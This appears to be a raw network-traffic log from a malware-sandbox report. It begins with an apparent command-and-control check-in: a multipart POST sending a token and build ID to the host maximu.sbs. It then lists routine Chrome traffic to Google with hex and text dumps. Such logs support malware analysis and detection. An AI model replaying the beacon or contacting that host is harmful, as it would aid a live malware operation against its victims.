                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----mgvk6ppph4e37ycjmy5f
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 489
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:17 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 6d 67 76 6b 36 70 70 70 68 34 65 33 37 79 63 6a 6d 79 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 6d 67 76 6b 36 70 70 70 68 34 65 33 37 79 63 6a 6d 79 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 6d 67 76 6b 36 70 70 70 68 34 65 33 37 79 63 6a 6d 79 35 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------mgvk6ppph4e37ycjmy5fContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------mgvk6ppph4e37ycjmy5fContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------mgvk6ppph4e37ycjmy5fCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:17 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          8192.168.2.449745216.58.206.684437828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:20 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:21 GMT
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-3ZXg08wQAid3o2nYUC70BA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC124INData Raw: 33 34 65 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6a 70 6d 6f 72 67 61 6e 20 63 68 61 73 65 20 62 61 6e 6b 22 2c 22 75 73 20 72 65 74 69 72 65 65 20 6d 61 6c 61 79 73 69 61 20 6d 6d 32 68 20 76 69 73 61 22 2c 22 6e 62 61 20 74 72 61 64 65 20 72 75 6d 6f 72 73 22 2c 22 7a 6f 64 69 61 63 20 73 69 67 6e 73 20 64 61 69 6c 79 20 68 6f 72 6f 73 63 6f 70 65 20 74 6f 64 61 79 22
                                                                                                                                                                                                                                                          Data Ascii: 34e)]}'["",["jpmorgan chase bank","us retiree malaysia mm2h visa","nba trade rumors","zodiac signs daily horoscope today"
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC729INData Raw: 2c 22 6e 6f 73 66 65 72 61 74 75 20 32 30 32 34 20 73 74 72 65 61 6d 69 6e 67 22 2c 22 73 61 6d 73 75 6e 67 20 67 61 6c 61 78 79 20 73 32 35 20 75 6c 74 72 61 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 77 69 6e 74 65 72 20 73 74 6f 72 6d 20 73 6e 6f 77 66 61 6c 6c 20 66 6f 72 65 63 61 73 74 22 2c 22 6c 61 6e 65 20 6a 6f 68 6e 73 6f 6e 20 76 73 20 70 65 6e 65 69 20 73 65 77 65 6c 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63
                                                                                                                                                                                                                                                          Data Ascii: ,"nosferatu 2024 streaming","samsung galaxy s25 ultra release date","winter storm snowfall forecast","lane johnson vs penei sewell"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          9192.168.2.449747216.58.206.684437828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Version: 713742394
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:21 GMT
                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC372INData Raw: 33 37 30 66 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                          Data Ascii: 370f)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                          Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                          Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                          Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                          Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 37 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                          Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700337,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4b 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4d 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73
                                                                                                                                                                                                                                                          Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Kd\u003dfunction(a){return new _.Jd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Ld\u003dglobalThis.trustedTypes;_.Md\u003dclass{constructor(a){this
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 24 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4d 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4d 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 61 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33
                                                                                                                                                                                                                                                          Data Ascii: hrow Error(\"F\");};_.ae\u003dfunction(a){if($d.test(a))return a};_.be\u003dfunction(a){if(a instanceof _.Md)if(a instanceof _.Md)a\u003da.i;else throw Error(\"F\");else a\u003d_.ae(a);return a};_.ce\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6f 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 45 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22
                                                                                                                                                                                                                                                          Data Ascii: .querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.oe\u003dfunction(a,b){_.Eb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC1390INData Raw: 75 72 6e 20 5f 2e 71 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5f 2e 71 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 28 62 5c 75 30 30 33 64 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 29 7d 3b 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 6c 65 74 20 62 3b 66 6f 72 28 3b 62 5c 75 30 30 33 64 61 2e 66 69 72 73 74 43 68 69 6c 64 3b 29 61 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 62 29 7d 3b
                                                                                                                                                                                                                                                          Data Ascii: urn _.qe(document,a)};_.qe\u003dfunction(a,b){b\u003dString(b);a.contentType\u003d\u003d\u003d\"application/xhtml+xml\"\u0026\u0026(b\u003db.toLowerCase());return a.createElement(b)};_.ue\u003dfunction(a){let b;for(;b\u003da.firstChild;)a.removeChild(b)};


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          10192.168.2.449748216.58.206.684437828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2025-01-13 19:18:21 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Version: 713742394
                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
